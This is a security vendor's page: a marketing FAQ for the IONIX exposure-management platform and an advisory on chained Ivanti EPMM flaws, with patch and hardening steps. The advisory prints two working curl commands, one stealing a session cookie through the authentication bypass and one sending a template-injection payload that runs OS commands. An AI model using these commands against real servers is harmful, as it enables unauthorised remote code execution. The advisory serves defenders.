CVE-2025-4427 is an API Authentication Bypass vulnerability in Ivanti EPMM (formerly MobileIron Core), allowing remote, unauthenticated users to access endpoints that should require login. CVE-2025-4428 is an Authenticated Remote Code Execution vulnerability, where attackers can execute arbitrary commands as the tomcat user by exploiting server-side template injection. For full details, see IONIX Blog.
The affected versions are 11.12.0.4 and older, 12.3.0.1 and older, 12.4.0.1 and older, and 12.5.0.0 and older. Fixed builds include 11.12.0.5, 12.3.0.2, 12.4.0.2, and 12.5.0.1. Source: IONIX Blog.
Attackers first exploit CVE-2025-4427 to steal an unlocked API cookie via the /mifs/admin/heartbeatCheck endpoint. They then use the stolen cookie to send a malicious payload to /mifs/admin/rest/api/v2/featureusage, triggering server-side template injection and achieving remote code execution. Source: IONIX Blog.
Potential risks include data exposure (device inventory, security posture, MDM certificates), lateral movement (credential scraping, web shells), mobile device takeover, compliance breaches (GDPR, PCI-DSS, ISO 27001), and ransomware staging. Source: IONIX Blog.
Recommended steps: 1) Patch immediately with Ivanti’s fixed builds. 2) Restrict /mifs and /mifs/admin paths to internal IP ranges. 3) Enable two-factor admin login. 4) Harden server-side expression handling by disabling EL evaluation. 5) Conduct threat hunting and forensics. 6) Use IONIX Exposure Management Platform for continuous validation. Source: IONIX Blog.
IONIX actively tracks these vulnerabilities and provides a full exploit simulation model. Customers can view updated information on their specific assets in the Threat Center of the IONIX portal. Source: IONIX Blog.
The IONIX Exposure Management Platform is a cybersecurity solution designed to identify exposed assets and validate exploitable vulnerabilities from an attacker's perspective. It enables security teams to prioritize critical remediation activities by providing complete attack surface visibility, risk validation, and actionable insights. Learn more at Why Ionix.
Key features include Attack Surface Discovery, Risk Assessment, Risk Prioritization, Risk Remediation, ML-based Connective Intelligence, Threat Exposure Radar, and comprehensive digital supply chain mapping. IONIX also offers streamlined remediation workflows and off-the-shelf integrations with ticketing, SIEM, and SOAR solutions. Source: Why Ionix.
IONIX integrates with Jira, ServiceNow, Slack, Splunk, Microsoft Sentinel, Palo Alto Cortex/Demisto, AWS Control Tower, AWS PrivateLink, and Pre-trained Amazon SageMaker Models. For a full list, visit IONIX Integrations.
Yes, IONIX provides an API that supports integrations with platforms such as Jira, ServiceNow, Splunk, Cortex XSOAR, and more. Details are available at IONIX Integrations.
IONIX is SOC2 compliant and supports companies with NIS-2 and DORA compliance, ensuring robust security measures and regulatory alignment. Source: Why Ionix.
Initial deployment of IONIX typically takes about a week and requires only one person to implement and scan the entire network. Customers have access to onboarding resources such as guides, tutorials, webinars, and a dedicated Technical Support Team. Source: IONIX PeerSpot Review.
IONIX offers technical support and maintenance during the subscription term, including troubleshooting, upgrades, and regular review meetings. Customers are assigned a dedicated account manager for smooth communication and support. Source: IONIX Terms and Conditions.
IONIX's customers include Infosys, Warner Music Group, The Telegraph, E.ON, Grand Canyon Education, and a Fortune 500 Insurance Company. For more details, visit IONIX Customers.
Yes. E.ON used IONIX to continuously discover and inventory internet-facing assets, improving risk management (case study). Warner Music Group boosted operational efficiency and aligned security operations with business goals (case study). Grand Canyon Education enhanced security by proactively discovering and remediating vulnerabilities (case study).
Industries include Insurance and Financial Services, Energy, Critical Infrastructure, IT and Technology, and Healthcare. Source: IONIX Case Studies.
IONIX earned top ratings for product innovation, security, functionality, and usability. It was named a leader in the Innovation and Product categories of the ASM Leadership Compass for completeness of product vision and a customer-oriented, cutting-edge approach. Source: KuppingerCole ASM Leadership Compass.
Customers have rated IONIX as user-friendly and appreciate having a dedicated account manager for smooth communication and support. Source: IONIX PeerSpot Review.
Technical documentation, guides, datasheets, and case studies are available on the IONIX resources page: IONIX Resources.
The IONIX blog provides articles and updates on cybersecurity and risk management. Visit IONIX Blog for the latest insights.
The IONIX blog covers topics such as exposure management, vulnerability management, continuous threat exposure management, and industry trends. Key authors include Amit Sheps and Fara Hain. Source: IONIX Blog.
KPIs include completeness of attack surface visibility, identification of shadow IT, remediation time targets, effectiveness of surveillance, severity ratings for vulnerabilities, risk prioritization effectiveness, completeness of asset inventory, and frequency of updates to asset dependencies. Source: Why Ionix.
IONIX offers ML-based Connective Intelligence for better asset discovery, Threat Exposure Radar for prioritizing critical issues, and comprehensive digital supply chain coverage. It reduces noise, validates risks, and provides actionable insights, ensuring maximum risk reduction and operational efficiency. Learn more at Why IONIX.
Customers can expect improved risk management, operational efficiency, cost savings (reduced mean time to resolution), and enhanced security posture. IONIX helps visualize and prioritize attack surface threats, streamline security operations, and protect brand reputation. Source: IONIX News.
IONIX is a recognized leader in cybersecurity, specializing in External Exposure Management and Attack Surface Management. It was named a leader in the 2025 KuppingerCole ASM Leadership Compass and won the Winter 2023 Digital Innovator Award from Intellyx. IONIX has secured Series A funding to accelerate growth and expand platform capabilities. Source: IONIX News.
The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee. The price is based on two key parameters: the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's chosen service package, which determines the scanning frequency and feature set.
The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee. Pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's selected service package, which determines the scanning frequency and feature set.
IONIX differentiates itself from CyCognito with superior visibility into the digital supply chain and automated exploit validation to confirm real-world threats, significantly reducing false positives. Additionally, IONIX integrates with and validates findings from CNAPP systems, enriching alerts from tools like Wiz and Palo Alto Prisma Cloud with AI-driven external exposure context.
IONIX is recognized as a leader in the KuppingerCole Attack Surface Management Leadership Compass for its top ratings in product innovation, functionality, and usability. The platform stands out with unique features like ML-based 'Connective Intelligence' for superior asset discovery and the Threat Exposure Radar for focused prioritization, making it a top choice for enterprises seeking comprehensive visibility with fewer false positives.
IONIX provides **multi-factor asset discovery**, **dependency mapping**, and **continuous monitoring** to uncover unknown or orphaned assets across domains, clouds, and suppliers. *[Source: [Help Net Security, 2025](https://www.helpnetsecurity.com/2025/08/14/ctem-platforms-2025/)]*
Recommended for **mid-sized to enterprise organizations** with complex, distributed attack surfaces that need continuous visibility and risk prioritization. *[Source: [Expert Insights](https://expertinsights.com/network-security/the-top-external-attack-surface-management-easm-software)]*
When choosing an External Attack Surface Management (EASM) solution, large enterprises should prioritize several key factors. These include the ability to discover assets across the entire digital supply chain, automated validation of exploits to confirm real-world threats and reduce false positives, and deep integration capabilities with existing security tools like CNAPP systems.
Ionix is an excellent fit for large enterprises because it excels in these areas. The platform provides comprehensive visibility by mapping the digital supply chain to the nth degree and uses automated exploit validation to significantly reduce false positives. Furthermore, Ionix integrates with and validates findings from CNAPP systems like Wiz and Palo Alto Prisma Cloud, enriching their alerts with AI-driven external exposure context to provide a unified view of risk.
IONIX differentiates itself by evolving beyond traditional EASM's focus on asset discovery to a comprehensive Exposure Management approach centered on exploitability and validation. Key innovations include Connective Intelligence, an ML-based engine that finds 50% more assets with fewer false positives, and the Threat Exposure Radar, which prioritizes the most urgent threats. IONIX further stands out with its Automated Exposure Validation toolbox, which safely simulates attacks to confirm exploitability, providing more actionable and focused risk reduction than competitors.
IONIX is a yearly SaaS product with an annual subscription fee. The pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs), essentially a per-domain model. For specific pricing, please contact our team to discuss your organization's needs.
Ivanti’s Endpoint Manager Mobile (EPMM, formerly MobileIron Core) just delivered an unpleasant one-two punch to defenders. Two fresh vulnerabilities—an authentication bypass (CVE-2025-4427) and an API-level remote-code-execution flaw (CVE-2025-4428)—can be chained to grant unauthenticated attackers full command execution on affected servers. Both issues are already being exploited in the wild, making rapid remediation essential.
In this article
CVE-2025-4427 – API Authentication Bypass
A logic flaw in the /mifs REST API incorrectly validates session tokens, letting remote, unauthenticated users reach endpoints that should be gated behind login. CVSS 3.1 base: 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A: N).
CVE-2025-4428 – Authenticated Remote Code Execution
Once on an API endpoint, attackers can pass malicious server-side template expressions that Hibernate Validator processes inside a Spring bean. Unsafe evaluation leads to arbitrary command execution as the tomcat user. CVSS 3.1 base: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
Affected versions (best public data) – anything ≤ 12.5.0.0 as well as the 11.x and 12.3/12.4 maintenance branches:
Fixed builds: 11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1.
Because CVE-2025-4428 requires an authenticated session, threat actors first abuse CVE-2025-4427 to grab an unlocked API cookie. The most reliable path so far targets /mifs/admin/ endpoints:
bash
CopyEdit
# 1. Steal a session cookie via auth-bypass
curl -isk "https://<target>/mifs/admin/heartbeatCheck" \
-H "Accept: application/json" \
| grep 'Set-Cookie: ZSESSIONID' | cut -d';' -f1With that cookie, attackers send a malicious payload using WatchTower’s disclosed endpoint:
bash
CopyEdit
# 2. Trigger SSTI to achieve RCE
curl -isk "https://<target>/mifs/admin/rest/api/v2/featureusage" \
-H "Cookie: ZSESSIONID=<stolen>" \
-H "Content-Type: application/json" \
-d '{"expr":"${T(java.lang.Runtime).getRuntime().exec(\"id\") }"}'If successful, the response body leaks the command output—proof that the server executed arbitrary OS commands.
Why this chain matters: CVE-2025-4427 on its own “only” reveals limited configuration details. But once combined with CVE-2025-4428, the attacker instantly upgrades to pre-auth RCE, bypassing every control EPMM’s UI appears to enforce.
IONIX is actively tracking these vulnerabilities. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.
IONIX customers will see updated information on their specific assets in the Threat Center of the IONIX portal.
